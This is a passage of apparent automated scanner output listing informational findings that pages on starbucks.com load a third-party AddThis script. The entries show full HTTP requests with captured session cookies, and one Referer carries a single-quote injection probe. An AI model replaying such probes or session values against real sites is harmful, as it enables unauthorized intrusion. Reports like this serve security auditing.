Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffeehouse/wireless-internet/in-canada

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /coffeehouse/wireless-internet/in-canada HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:08:49 GMT
Connection: close
Content-Length: 38114

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.55. http://www.starbucks.com/coffeehouse/wireless-internet/starbucks-digital-network  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffeehouse/wireless-internet/starbucks-digital-network

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /coffeehouse/wireless-internet/starbucks-digital-network HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:08:51 GMT
Connection: close
Content-Length: 38572

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.56. http://www.starbucks.com/customer-service  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /customer-service

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /customer-service HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:19:36 GMT
Connection: close
Content-Length: 34642

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.57. http://www.starbucks.com/customer-service/contact  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /customer-service/contact

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /customer-service/contact HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:08:17 GMT
Connection: close
Content-Length: 37039

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.58. http://www.starbucks.com/customer-service/faqs/card  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /customer-service/faqs/card

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /customer-service/faqs/card HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:07:45 GMT
Connection: close
Content-Length: 87706

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.59. http://www.starbucks.com/customer-service/faqs/coffee  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /customer-service/faqs/coffee

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /customer-service/faqs/coffee HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:05:17 GMT
Connection: close
Content-Length: 37412

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.60. http://www.starbucks.com/customer-service/faqs/coffeehouse  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /customer-service/faqs/coffeehouse

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /customer-service/faqs/coffeehouse HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:06:23 GMT
Connection: close
Content-Length: 59009

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.61. http://www.starbucks.com/customer-service/faqs/menu  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /customer-service/faqs/menu

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /customer-service/faqs/menu HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:05:58 GMT
Connection: close
Content-Length: 36954

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.62. http://www.starbucks.com/customer-service/faqs/responsibility  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /customer-service/faqs/responsibility

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /customer-service/faqs/responsibility HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:07:07 GMT
Connection: close
Content-Length: 37177

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.63. http://www.starbucks.com/customer-service/faqs/shop  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /customer-service/faqs/shop

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /customer-service/faqs/shop HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:08:01 GMT
Connection: close
Content-Length: 51544

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.64. http://www.starbucks.com/menu  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /menu HTTP/1.1
Host: www.starbucks.com
Proxy-Connection: keep-alive
Referer: http://www.starbucks.com/search?keywords=%27
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utmv=; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.2.10.1297134218; _chartbeat2=vqos4oan0hnfddev

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:03:26 GMT
Content-Length: 73176

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.65. http://www.starbucks.com/menu/catalog/nutrition  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/catalog/nutrition

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /menu/catalog/nutrition?drink=bottled-drinks HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:03:53 GMT
Connection: close
Content-Length: 44711

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.66. http://www.starbucks.com/menu/drinks  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /menu/drinks HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:39:37 GMT
Connection: close
Content-Length: 62434

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.67. http://www.starbucks.com/menu/drinks/bottled-drinks/bottled-frappuccino-dark-chocolate-mocha  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/bottled-drinks/bottled-frappuccino-dark-chocolate-mocha

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /menu/drinks/bottled-drinks/bottled-frappuccino-dark-chocolate-mocha HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:28:22 GMT
Connection: close
Content-Length: 39718

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.68. http://www.starbucks.com/menu/drinks/bottled-drinks/bottled-frappuccino-mocha  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/bottled-drinks/bottled-frappuccino-mocha

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /menu/drinks/bottled-drinks/bottled-frappuccino-mocha HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:29:02 GMT
Connection: close
Content-Length: 39641

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.69. http://www.starbucks.com/menu/drinks/bottled-drinks/bottled-frappuccino-vanilla  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/bottled-drinks/bottled-frappuccino-vanilla

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /menu/drinks/bottled-drinks/bottled-frappuccino-vanilla HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:29:11 GMT
Connection: close
Content-Length: 39711

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.70. http://www.starbucks.com/menu/drinks/bottled-drinks/cinnamon-dolce-doubleshot-with-energy  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/bottled-drinks/cinnamon-dolce-doubleshot-with-energy

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /menu/drinks/bottled-drinks/cinnamon-dolce-doubleshot-with-energy HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:26:46 GMT
Connection: close
Content-Length: 39510

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.71. http://www.starbucks.com/menu/drinks/bottled-drinks/coffee-doubleshot-with-energy  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/bottled-drinks/coffee-doubleshot-with-energy

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /menu/drinks/bottled-drinks/coffee-doubleshot-with-energy HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:27:15 GMT
Connection: close
Content-Length: 39644

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.72. http://www.starbucks.com/menu/drinks/bottled-drinks/coffee-frappuccino  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/bottled-drinks/coffee-frappuccino

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /menu/drinks/bottled-drinks/coffee-frappuccino HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:28:25 GMT
Connection: close
Content-Length: 39621

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.73. http://www.starbucks.com/menu/drinks/bottled-drinks/espresso-and-cream-doubleshot  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/bottled-drinks/espresso-and-cream-doubleshot

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /menu/drinks/bottled-drinks/espresso-and-cream-doubleshot HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
